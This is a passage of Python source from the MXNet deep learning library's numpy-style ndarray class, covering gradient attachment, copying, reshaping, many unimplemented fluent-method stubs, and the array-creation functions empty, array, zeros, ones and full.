[0.84426576 0.60276335 0.85794562]] @gpu(0)
"""
array_str = self.asnumpy().__repr__()
dtype = self.dtype
if 'dtype=' in array_str:
if dtype == _np.float32:
array_str = array_str[:array_str.rindex(',')] + ')'
elif dtype != _np.float32:
array_str = array_str[:-1] + ', dtype={})'.format(dtype.__name__)
context = self.context
if context.device_type == 'cpu':
return array_str
return array_str[:-1] + ', ctx={})'.format(str(context))
def __str__(self):
"""Returns a string representation of the array."""
array_str = self.asnumpy().__str__()
context = self.context
if context.device_type == 'cpu' or self.ndim == 0:
return array_str
return '{array} @{ctx}'.format(array=array_str, ctx=context)
def attach_grad(self, grad_req='write'): # pylint: disable=arguments-differ
"""Attach a gradient buffer to this ndarray, so that `backward`
can compute gradient with respect to it.
Parameters
----------
grad_req : {'write', 'add', 'null'}
How gradient will be accumulated.
- 'write': gradient will be overwritten on every backward.
- 'add': gradient will be added to existing value on every backward.
- 'null': do not compute gradient for this NDArray.
"""
grad = _mx_np_op.zeros_like(self) # pylint: disable=undefined-variable
grad_req = _GRAD_REQ_MAP[grad_req]
check_call(_LIB.MXAutogradMarkVariables(
1, ctypes.pointer(self.handle),
ctypes.pointer(mx_uint(grad_req)),
ctypes.pointer(grad.handle)))
@property
def grad(self):
"""Returns gradient buffer attached to this ndarray."""
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayGetGrad(self.handle, ctypes.byref(hdl)))
if hdl.value is None:
return None
return _np_ndarray_cls(hdl)
def detach(self):
"""Returns a new ndarray, detached from the current graph."""
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayDetach(self.handle, ctypes.byref(hdl)))
return _np_ndarray_cls(hdl)
def astype(self, dtype, *args, **kwargs): # pylint: disable=arguments-differ,unused-argument
"""
Copy of the array, cast to a specified type.
Parameters
----------
dtype : str or dtype
Typecode or data-type to which the array is cast.
copy : bool, optional
Default `True`. By default, astype always returns a newly
allocated ndarray on the same context. If this is set to
`False`, and the dtype requested is the same as the ndarray's
dtype, the ndarray is returned instead of a copy.
Returns
-------
arr_t : ndarray
Unless `copy` is False and the other conditions for returning the input
array are satisfied (see description for `copy` input parameter), `arr_t`
is a new array of the same shape as the input array with `dtype`.
"""
_sanity_check_params('astype', ['order', 'casting', 'subok'], kwargs)
copy = kwargs.get('copy', True)
if not copy and _np.dtype(dtype) == self.dtype:
return self
res = empty(self.shape, dtype=dtype, ctx=self.context)
self.copyto(res)
return res
def copyto(self, other):
"""Copies the value of this array to another array.
If ``other`` is a ``ndarray`` object, then ``other.shape`` and
``self.shape`` should be the same. This function copies the value from
``self`` to ``other``.
If ``other`` is a context, a new ``np.ndarray`` will be first created on
the target context, and the value of ``self`` is copied.
Parameters
----------
other : ndarray or Context
The destination array or context.
Returns
-------
out: ndarray
The copied array. If ``other`` is an ``ndarray``, then the return value
and ``other`` will point to the same ``ndarray``.
Examples
--------
>>> x = np.ones((2, 3))
>>> y = np.zeros((2, 3), ctx=npx.gpu(0))
>>> z = x.copyto(y)
>>> z is y
True
>>> y
array([[ 1., 1., 1.],
[ 1., 1., 1.]])
"""
if isinstance(other, ndarray):
if other.handle is self.handle:
warnings.warn('You are attempting to copy an array to itself', RuntimeWarning)
return False
return _npi.copyto(self, out=other)
elif isinstance(other, Context):
hret = ndarray(_new_alloc_handle(self.shape, other, True, self.dtype))
return _npi.copyto(self, out=hret)
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def asscalar(self):
raise AttributeError('mxnet.numpy.ndarray object has no attribute asscalar')
def argmax(self, axis=None, out=None): # pylint: disable=arguments-differ
"""Return indices of the maximum values along the given axis.
Refer to `mxnet.numpy.argmax` for full documentation."""
return argmax(self, axis, out)
def as_in_context(self, context):
"""This function has been deprecated. Please refer to ``ndarray.as_in_ctx``."""
warnings.warn('ndarray.context has been renamed to ndarray.ctx', DeprecationWarning)
return self.as_nd_ndarray().as_in_context(context).as_np_ndarray()
def as_in_ctx(self, ctx):
"""Returns an array on the target device with the same value as this array.
If the target context is the same as ``self.context``, then ``self`` is
returned. Otherwise, a copy is made.
Parameters
----------
context : Context
The target context.
Returns
-------
ndarray
The target array.
"""
if self.ctx == ctx:
return self
return self.copyto(ctx)
@property
def ctx(self):
"""Device context of the array.
Examples
--------
>>> x = np.array([1, 2, 3, 4])
>>> x.ctx
cpu(0)
>>> type(x.ctx)
<class 'mxnet.context.Context'>
>>> y = np.zeros((2, 3), npx.gpu(0))
>>> y.ctx
gpu(0)
"""
dev_typeid = ctypes.c_int()
dev_id = ctypes.c_int()
check_call(_LIB.MXNDArrayGetContext(
self.handle, ctypes.byref(dev_typeid), ctypes.byref(dev_id)))
return Context(Context.devtype2str[dev_typeid.value], dev_id.value)
@property
def context(self):
"""This function has been deprecated. Please refer to ``ndarray.ctx``."""
warnings.warn('ndarray.context has been renamed to ndarray.ctx', DeprecationWarning)
return self.as_nd_ndarray().context
def copy(self, order='C'): # pylint: disable=arguments-differ
"""Return a coyp of the array, keeping the same context.
Parameters
----------
order : str
The memory layout of the copy. Currently, only c-contiguous memory
layout is supported.
Examples
--------
>>> x = np.ones((2, 3))
>>> y = x.copy()
>>> y
array([[ 1., 1., 1.],
[ 1., 1., 1.]])
"""
if order != 'C':
raise NotImplementedError('ndarray.copy only supports order=\'C\', while '
'received {}'.format(str(order)))
return self.copyto(self.ctx)
def dot(self, b, out=None):
"""Dot product of two arrays.
Refer to ``numpy.dot`` for full documentation."""
return _mx_np_op.dot(self, b, out=out)
def reshape(self, *args, **kwargs): # pylint: disable=arguments-differ
"""Returns a copy of the array with a new shape.
Notes
-----
Unlike the free function `numpy.reshape`, this method on `ndarray` allows
the elements of the shape parameter to be passed in as separate arguments.
For example, ``a.reshape(10, 11)`` is equivalent to
``a.reshape((10, 11))``.
"""
order = 'C'
if len(kwargs) > 1:
raise TypeError('function takes at most 1 keyword argument')
if len(kwargs) == 1:
if 'order' not in kwargs:
raise TypeError('{} is an invalid keyword argument for this function'
.format(kwargs.keys()[0]))
order = kwargs.pop('order', 'C')
if order != 'C':
raise NotImplementedError('only supports C-order,'
' while received {}'.format(order))
if len(args) == 0:
raise TypeError('reshape() takes exactly 1 argument (0 given)')
if len(args) == 1 and isinstance(args[0], tuple):
return _mx_np_op.reshape(self, newshape=args[0], order=order)
else:
return _mx_np_op.reshape(self, newshape=args, order=order)
def reshape_like(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`reshape_like`.
The arguments are the same as for :py:func:`reshape_like`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute reshape_like')
def reshape_view(self, *shape, **kwargs):
"""Returns a **view** of this array with a new shape without altering any data.
Inheritated from NDArray.reshape.
"""
return super(ndarray, self).reshape(*shape, **kwargs)
def zeros_like(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`zeros_like`.
The arguments are the same as for :py:func:`zeros_like`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute zeros_like')
def ones_like(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`ones_like`.
The arguments are the same as for :py:func:`ones_like`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute ones_like')
def broadcast_axes(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`broadcast_axes`.
The arguments are the same as for :py:func:`broadcast_axes`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute broadcast_like')
def repeat(self, repeats, axis=None): # pylint: disable=arguments-differ
"""Repeat elements of an array."""
return _mx_np_op.repeat(self, repeats=repeats, axis=axis)
def pad(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`pad`.
The arguments are the same as for :py:func:`pad`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute pad')
def swapaxes(self, axis1, axis2): # pylint: disable=arguments-differ
"""Return a copy of the array with axis1 and axis2 interchanged.
Refer to `mxnet.numpy.swapaxes` for full documentation.
"""
return swapaxes(self, axis1, axis2)
def split(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`split`.
The arguments are the same as for :py:func:`split`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute split')
def split_v2(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`split_v2`.
The arguments are the same as for :py:func:`split_v2`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute split_v2')
def slice(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`slice`.
The arguments are the same as for :py:func:`slice`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute slice')
def slice_axis(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`slice_axis`.
The arguments are the same as for :py:func:`slice_axis`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute slice_axis')
def slice_like(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`slice_like`.
The arguments are the same as for :py:func:`slice_like`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute slice_like')
def slice_assign_scalar(self, value, begin, end, step):
"""
Assign the scalar to a cropped subset of this ndarray. Value will broadcast to the shape of the cropped shape
and will be cast to the same dtype of the ndarray.
Parameters
----------
value: numeric value
Value and this ndarray should be of the same data type.
The shape of rhs should be the same as the cropped shape of this ndarray.
begin: tuple of begin indices
end: tuple of end indices
step: tuple of step lenghths
Returns
-------
This ndarray.
Examples
--------
>>> x = np.ones((2, 2, 2))
>>> y = x.slice_assign_scalar(0, (0, 0, None), (1, 1, None), (None, None, None))
>>> y
array([[[0., 0.],
[1., 1.]],
[[1., 1.],
[1., 1.]]])
>>> x
array([[[0., 0.],
[1., 1.]],
[[1., 1.],
[1., 1.]]])
"""
return _npi.slice_assign_scalar(self, value, begin=begin, end=end, step=step, out=self)
def slice_assign(self, rhs, begin, end, step):
"""
Assign the rhs to a cropped subset of this ndarray in place.
Returns the view of this ndarray.
Parameters
----------
rhs: ndarray.
rhs and this NDArray should be of the same data type, and on the same device.
The shape of rhs should be the same as the cropped shape of this ndarray.
begin: tuple of begin indices
end: tuple of end indices
step: tuple of step lenghths
Returns
-------
out : ndarray
This ndarray.
Examples
--------
>>> x = np.ones((2, 2, 2))
>>> assigned = np.zeros((1, 1, 2))
>>> y = x.slice_assign(assigned, (0, 0, None), (1, 1, None), (None, None, None))
>>> y
array([[[0., 0.],
[1., 1.]],
[[1., 1.],
[1., 1.]]])
>>> x
array([[[0., 0.],
[1., 1.]],
[[1., 1.],
[1., 1.]]])
"""
return _npi.slice_assign(self, rhs, begin=begin, end=end, step=step, out=self)
def take(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`take`.
The arguments are the same as for :py:func:`take`, with
this array as data.
"""
raise NotImplementedError
def one_hot(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`one_hot`.
The arguments are the same as for :py:func:`one_hot`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute one_hot')
def pick(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`pick`.
The arguments are the same as for :py:func:`pick`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute pick')
def sort(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sort`.
The arguments are the same as for :py:func:`sort`, with
this array as data.
"""
raise NotImplementedError
def topk(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`topk`.
The arguments are the same as for :py:func:`topk`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute topk')
def argsort(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`argsort`.
The arguments are the same as for :py:func:`argsort`, with
this array as data.
"""
raise NotImplementedError
def argmax_channel(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`argmax_channel`.
The arguments are the same as for :py:func:`argmax_channel`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute argmax_channel')
def argmin(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`argmin`.
The arguments are the same as for :py:func:`argmin`, with
this array as data.
"""
raise NotImplementedError
def clip(self, min=None, max=None, out=None): # pylint: disable=arguments-differ
"""Return an array whose values are limited to [min, max].
One of max or min must be given.
"""
return clip(self, min, max, out=out)
def abs(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`abs`.
The arguments are the same as for :py:func:`abs`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute abs')
def sign(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sign`.
The arguments are the same as for :py:func:`sign`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sign')
def flatten(self, order='C'): # pylint: disable=arguments-differ
"""Return a copy of the array collapsed into one dimension."""
return self.reshape(-1, order=order)
def shape_array(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`shape_array`.
The arguments are the same as for :py:func:`shape_array`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute shape_array')
def size_array(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`size_array`.
The arguments are the same as for :py:func:`size_array`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute size_array')
def expand_dims(self, *args, **kwargs): # pylint: disable=arguments-differ,unused-argument
"""Convenience fluent method for :py:func:`expand_dims`.
The arguments are the same as for :py:func:`expand_dims`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute expand_dims')
def tile(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`tile`.
The arguments are the same as for :py:func:`tile`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute tile')
def transpose(self, *axes): # pylint: disable=arguments-differ
"""Permute the dimensions of an array."""
return _mx_np_op.transpose(self, axes=axes if len(axes) != 0 else None)
def flip(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`flip`.
The arguments are the same as for :py:func:`flip`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute flip')
def depth_to_space(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`depth_to_space`.
The arguments are the same as for :py:func:`depth_to_space`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute depth_to_space')
def space_to_depth(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`space_to_depth`.
The arguments are the same as for :py:func:`space_to_depth`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute space_to_depth')
def diag(self, k=0, **kwargs):
"""Convenience fluent method for :py:func:`diag`.
The arguments are the same as for :py:func:`diag`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute diag')
def sum(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Return the sum of the array elements over the given axis."""
return _mx_np_op.sum(self, axis=axis, dtype=dtype, out=out, keepdims=keepdims)
def nansum(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`nansum`.
The arguments are the same as for :py:func:`nansum`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute nansum')
def prod(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Return the product of the array elements over the given axis."""
return _mx_np_op.prod(self, axis=axis, dtype=dtype, keepdims=keepdims, out=out)
def nanprod(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`nanprod`.
The arguments are the same as for :py:func:`nanprod`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute nanprod')
def mean(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Returns the average of the array elements along given axis."""
return mean(self, axis=axis, dtype=dtype, out=out, keepdims=keepdims)
def std(self, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=arguments-differ
"""Returns the standard deviation of the array elements along given axis."""
return std(self, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
def var(self, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=arguments-differ
"""Returns the variance of the array elements, along given axis."""
return var(self, axis=axis, dtype=dtype, out=out, ddof=ddof, keepdims=keepdims)
def cumsum(self, axis=None, dtype=None, out=None):
"""Return the cumulative sum of the elements along the given axis."""
return _mx_np_op.cumsum(self, axis=axis, dtype=dtype, out=out)
def tolist(self):
return self.asnumpy().tolist()
def max(self, axis=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Return the maximum along a given axis."""
return _mx_np_op.max(self, axis=axis, keepdims=keepdims, out=out)
def min(self, axis=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Convenience fluent method for :py:func:`min`.
The arguments are the same as for :py:func:`min`, with
this array as data.
"""
return _mx_np_op.min(self, axis=axis, keepdims=keepdims, out=out)
def norm(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`norm`.
The arguments are the same as for :py:func:`norm`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute norm')
def round(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`round`.
The arguments are the same as for :py:func:`round`, with
this array as data.
"""
raise NotImplementedError
def rint(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`rint`.
The arguments are the same as for :py:func:`rint`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute rint')
def fix(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`fix`.
The arguments are the same as for :py:func:`fix`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute fix')
def floor(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`floor`.
The arguments are the same as for :py:func:`floor`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute floor')
def ceil(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`ceil`.
The arguments are the same as for :py:func:`ceil`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute ceil')
def trunc(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`trunc`.
The arguments are the same as for :py:func:`trunc`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute trunc')
def sin(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sin`.
The arguments are the same as for :py:func:`sin`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sin')
def cos(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`cos`.
The arguments are the same as for :py:func:`cos`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute cos')
def tan(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`tan`.
The arguments are the same as for :py:func:`tan`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute tan')
def arcsin(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arcsin`.
The arguments are the same as for :py:func:`arcsin`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arcsin')
def arccos(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arccos`.
The arguments are the same as for :py:func:`arccos`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arccos')
def arctan(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arctan`.
The arguments are the same as for :py:func:`arctan`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arctan')
def degrees(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`degrees`.
The arguments are the same as for :py:func:`degrees`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute degrees')
def radians(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`radians`.
The arguments are the same as for :py:func:`radians`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute radians')
def sinh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sinh`.
The arguments are the same as for :py:func:`sinh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sinh')
def cosh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`cosh`.
The arguments are the same as for :py:func:`cosh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute cosh')
def tanh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`tanh`.
The arguments are the same as for :py:func:`tanh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute tanh')
def arcsinh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arcsinh`.
The arguments are the same as for :py:func:`arcsinh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arcsinh')
def arccosh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arccosh`.
The arguments are the same as for :py:func:`arccosh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arccosh')
def arctanh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arctanh`.
The arguments are the same as for :py:func:`arctanh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arctanh')
def exp(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`exp`.
The arguments are the same as for :py:func:`exp`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute exp')
def expm1(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`expm1`.
The arguments are the same as for :py:func:`expm1`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute expm1')
def log(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log`.
The arguments are the same as for :py:func:`log`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log')
def log10(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log10`.
The arguments are the same as for :py:func:`log10`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log10')
def log2(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log2`.
The arguments are the same as for :py:func:`log2`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log2')
def log1p(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log1p`.
The arguments are the same as for :py:func:`log1p`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log1p')
def sqrt(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sqrt`.
The arguments are the same as for :py:func:`sqrt`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sqrt')
def rsqrt(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`rsqrt`.
The arguments are the same as for :py:func:`rsqrt`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute rsqrt')
def cbrt(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`cbrt`.
The arguments are the same as for :py:func:`cbrt`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute cqrt')
def rcbrt(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`rcbrt`.
The arguments are the same as for :py:func:`rcbrt`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute rcqrt')
def square(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`square`.
The arguments are the same as for :py:func:`square`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute square')
def reciprocal(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`reciprocal`.
The arguments are the same as for :py:func:`reciprocal`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute reciprocal')
def relu(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`relu`.
The arguments are the same as for :py:func:`relu`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute relu')
def sigmoid(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sigmoid`.
The arguments are the same as for :py:func:`sigmoid`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sigmoid')
def softmax(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`softmax`.
The arguments are the same as for :py:func:`softmax`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute softmax')
def log_softmax(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log_softmax`.
The arguments are the same as for :py:func:`log_softmax`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log_softmax')
def softmin(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`softmin`.
The arguments are the same as for :py:func:`softmin`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute softmin')
def squeeze(self, axis=None): # pylint: disable=arguments-differ
"""Remove single-dimensional entries from the shape of a."""
return _mx_np_op.squeeze(self, axis=axis)
def broadcast_to(self, shape):
return _mx_np_op.broadcast_to(self, shape)
def broadcast_like(self, other):
raise AttributeError('mxnet.numpy.ndarray object has no attribute broadcast_like')
def _full(self, value):
"""
Currently for internal use only. Implemented for __setitem__.
Assign to self an array of self's same shape and type, filled with value.
"""
return _mx_nd_np.full(self.shape, value, ctx=self.context, dtype=self.dtype, out=self)
# pylint: disable=redefined-outer-name
def _scatter_set_nd(self, value_nd, indices):
"""
This is added as an ndarray class method in order to support polymorphism in NDArray and numpy.ndarray indexing
"""
return _npi.scatter_set_nd(
lhs=self, rhs=value_nd, indices=indices, shape=self.shape, out=self
)
# pylint: enable=redefined-outer-name
@property
def shape(self):
return super(ndarray, self).shape
@property
def ndim(self):
"""Number of array dimensions."""
return len(self.shape)
@property
def size(self):
"""Number of elements in the array."""
return super(ndarray, self).size
def tostype(self, stype):
raise AttributeError('mxnet.numpy.ndarray object has no attribute tostype')
@set_module('mxnet.numpy')
def empty(shape, dtype=_np.float32, order='C', ctx=None):
"""Return a new array of given shape and type, without initializing entries.
Parameters
----------
shape : int or tuple of int Shape of the empty array, e.g., ``(2, 3)`` or ``2``.
dtype : data-type, optional
Desired output data-type for the array, e.g, `numpy.int8`. Default is
`numpy.float32`. Note that this behavior is different from NumPy's `empty`
function where `float64` is the default value, because `float32` is
considered as the default data type in deep learning.
order : {'C'}, optional, default: 'C'
How to store multi-dimensional data in memory, currently only row-major
(C-style) is supported.
ctx : device context, optional
Device context on which the memory is allocated. Default is
`mxnet.context.current_context()`.
Returns
-------
out : ndarray
Array of uninitialized (arbitrary) data of the given shape, dtype, and order.
"""
if order != 'C':
raise NotImplementedError('`empty` only supports order equal to `C`, while received {}'
.format(str(order)))
if ctx is None:
ctx = current_context()
if dtype is None:
dtype = _np.float32
if isinstance(shape, int):
shape = (shape,)
return ndarray(handle=_new_alloc_handle(shape, ctx, False, dtype))
@set_module('mxnet.numpy')
def array(object, dtype=None, ctx=None):
"""
Create an array.
Parameters
----------
object : array_like or `numpy.ndarray` or `mxnet.numpy.ndarray`
An array, any object exposing the array interface, an object whose
__array__ method returns an array, or any (nested) sequence.
dtype : data-type, optional
The desired data-type for the array. Default is `float32`.
ctx : device context, optional
Device context on which the memory is allocated. Default is
`mxnet.context.current_context()`.
Returns
-------
out : ndarray
An array object satisfying the specified requirements.
"""
if ctx is None:
ctx = current_context()
if isinstance(object, ndarray):
dtype = object.dtype if dtype is None else dtype
else:
dtype = _np.float32 if dtype is None else dtype
if not isinstance(object, (ndarray, _np.ndarray)):
try:
object = _np.array(object, dtype=dtype)
except Exception as e:
raise TypeError('{}'.format(str(e)))
ret = empty(object.shape, dtype=dtype, ctx=ctx)
if len(object.shape) == 0:
ret[()] = object
else:
ret[:] = object
return ret
@set_module('mxnet.numpy')
def zeros(shape, dtype=_np.float32, order='C', ctx=None):
"""Return a new array of given shape and type, filled with zeros.
This function currently only supports storing multi-dimensional data
in row-major (C-style).
Parameters
----------
shape : int or tuple of int
The shape of the empty array.
dtype : str or numpy.dtype, optional
An optional value type (default is `numpy.float32`). Note that this
behavior is different from NumPy's `ones` function where `float64`
is the default value, because `float32` is considered as the default
data type in deep learning.
order : {'C'}, optional, default: 'C'
How to store multi-dimensional data in memory, currently only row-major
(C-style) is supported.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray
Array of zeros with the given shape, dtype, and ctx.
"""
return _mx_nd_np.zeros(shape, dtype, order, ctx)
@set_module('mxnet.numpy')
def ones(shape, dtype=_np.float32, order='C', ctx=None):
"""Return a new array of given shape and type, filled with zeros.
This function currently only supports storing multi-dimensional data
in row-major (C-style).
Parameters
----------
shape : int or tuple of int
The shape of the empty array.
dtype : str or numpy.dtype, optional
An optional value type. Default is `numpy.float32`. Note that this
behavior is different from NumPy's `ones` function where `float64`
is the default value, because `float32` is considered as the default
data type in deep learning.
order : {'C'}, optional, default: 'C'
How to store multi-dimensional data in memory, currently only row-major
(C-style) is supported.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray
Array of zeros with the given shape, dtype, and ctx.
"""
return _mx_nd_np.ones(shape, dtype, order, ctx)
@set_module('mxnet.numpy')
def full(shape, fill_value, dtype=None, order='C', ctx=None, out=None): # pylint: disable=too-many-arguments
"""
Return a new array of given shape and type, filled with `fill_value`.
Parameters
----------
shape : int or sequence of ints
Shape of the new array, e.g., ``(2, 3)`` or ``2``.
fill_value : scalar
Fill value.
dtype : data-type, optional
The desired data-type for the array. The default, `None`, means
`np.array(fill_value).dtype`.
order : {'C'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. Currently only supports C order.
ctx: to specify the device, e.g. the i-th GPU.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
out : ndarray
Array of `fill_value` with the given shape, dtype, and order.
Notes
-----
This function differs from the original `numpy.full
https://docs.scipy.org/doc/numpy/reference/generated/numpy.full.html`_ in
the following way(s):
- Has an additional `ctx` argument to specify the device
- Has an additional `out` argument
- Currently does not support `order` selection
See Also
--------
empty : Return a new uninitialized array.
ones : Return a new array setting values to one.
zeros : Return a new array setting values to zero.
Examples
--------
